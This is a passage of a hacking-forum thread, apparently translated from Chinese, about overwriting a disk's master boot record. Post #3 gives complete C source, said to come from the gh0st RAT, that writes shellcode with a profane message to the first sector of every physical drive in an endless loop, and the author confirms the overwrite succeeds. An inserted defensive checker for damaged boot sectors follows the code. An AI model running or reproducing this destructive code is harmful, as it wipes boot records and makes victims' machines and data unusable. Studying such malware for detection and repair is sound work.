Ability: (LV3, RANK:20)
Post #2
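If it's only the MBR that gets changed, it's no big deal; plenty of software can restore the MBR, such as diskgen and bootice. Of course, if you haven't prepared a PE or a third-party system, it really would be a hassle once you shut down. Use GetLastError and you can see exactly why it failed.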
Ability: (LV2, RANK:10)
Post #3
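/*
Taken from the hard-disk lock used for copyright protection in the source code of the gh0st RAT, version 3.6, with only minor modifications.
I learned about it through this article: http://blog.csdn.net/qiurisuixiang/article/details/7314882
2013/7/11 by 赫
*/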
#include "stdafx.h"
int KillMBR() ;
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x48\x45\x20"
"\x46\x75\x63\x6b\x20\x79\x6f\x75\x0D\x3C\x3C\x3C\x2B\x3E\x3E\x3E";
DWORD Sr = 10;
int _tmain(int argc, _TCHAR* argv[])
{
while(1)
{
if(Sr == 0)
{
Sr = 11;
KillMBR();
}
else if(Sr < 11)
{
Sr--;
KillMBR();
}
else
{
KillMBR();
Sr++;
}
}
return 0;
}
int KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
wchar_t MBR_Path[128] ;
// Rebuild the MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
StringCchPrintf(MBR_Path,128,_T("\\\\.\\PHYSICALDRIVE%d%c"),Sr,_T('\0'));
hDevice = CreateFile
(
MBR_Path,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// Write the virus content
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
//ExitProcess(-1);
return 0;
}
I modified the program a bit myself; I don't know whether it works...
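A defender's counterpart to the code in the post above, added here as an example that is not part of the original thread or of gh0st: a check over a 512-byte sector-0 dump that flags a sector carrying a valid 0x55AA signature but no partition entries, which is the layout the posted buffer has. The function names, status codes and sample sectors are assumptions constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SECTOR_SIZE 512
#define PART_TABLE_OFF 446   /* four 16-byte entries, then 0x55 0xAA */
enum mbr_status { MBR_OK = 0, MBR_NO_SIGNATURE, MBR_EMPTY_TABLE, MBR_BAD_ENTRY };

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Classify a 512-byte sector-0 dump (for example a backup image taken with a disk tool). */
enum mbr_status check_mbr(const uint8_t s[SECTOR_SIZE]) {
    int used = 0;
    if (s[510] != 0x55 || s[511] != 0xAA)
        return MBR_NO_SIGNATURE;
    for (int i = 0; i < 4; i++) {
        const uint8_t *e = s + PART_TABLE_OFF + 16 * i;
        uint8_t boot_flag = e[0], type = e[4];
        uint32_t lba_start = le32(e + 8), sectors = le32(e + 12);
        if (type == 0x00)
            continue;                      /* unused slot */
        if ((boot_flag != 0x00 && boot_flag != 0x80) || lba_start == 0 || sectors == 0)
            return MBR_BAD_ENTRY;          /* slot in use but its fields are inconsistent */
        used++;
    }
    /* Valid signature but no partitions: a sector whose table was zeroed and re-signed. */
    return used ? MBR_OK : MBR_EMPTY_TABLE;
}

/* Constructed samples: signed sector, optionally with one active type-0x07 partition. */
void make_sample(uint8_t s[SECTOR_SIZE], int with_partition) {
    memset(s, 0, SECTOR_SIZE);
    s[510] = 0x55; s[511] = 0xAA;
    if (with_partition) {
        uint8_t *e = s + PART_TABLE_OFF;
        e[0] = 0x80; e[4] = 0x07;          /* active flag, partition type */
        e[9] = 0x08;                       /* start LBA 0x00000800 = 2048 */
        e[14] = 0x10;                      /* length 0x00100000 sectors */
    }
}

int main(void) {
    uint8_t s[SECTOR_SIZE];
    make_sample(s, 1); printf("with partition: %d\n", check_mbr(s));
    make_sample(s, 0); printf("empty table:    %d\n", check_mbr(s));
    return 0;
}
```

A result of MBR_EMPTY_TABLE on a disk that previously held partitions is the cue to restore sector 0 from a known-good backup before the next reboot.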
Ability: (LV2, RANK:10)
Post #4
Thanks. Actually the change did succeed; it just doesn't display properly. I hadn't tested it before.
Ability: (LV2, RANK:10)
Post #5
I'd really like to learn the experts' techniques.
Ability: (LV4, RANK:40)
Post #6
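Changing the MBR is easy, but constructing a good MBR is hard. You can't possibly just write your trojan's code into the MBR; that definitely won't work.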
Ability: (LV2, RANK:10)
Post #7
Many thanks for the guidance, senior. Studying hard.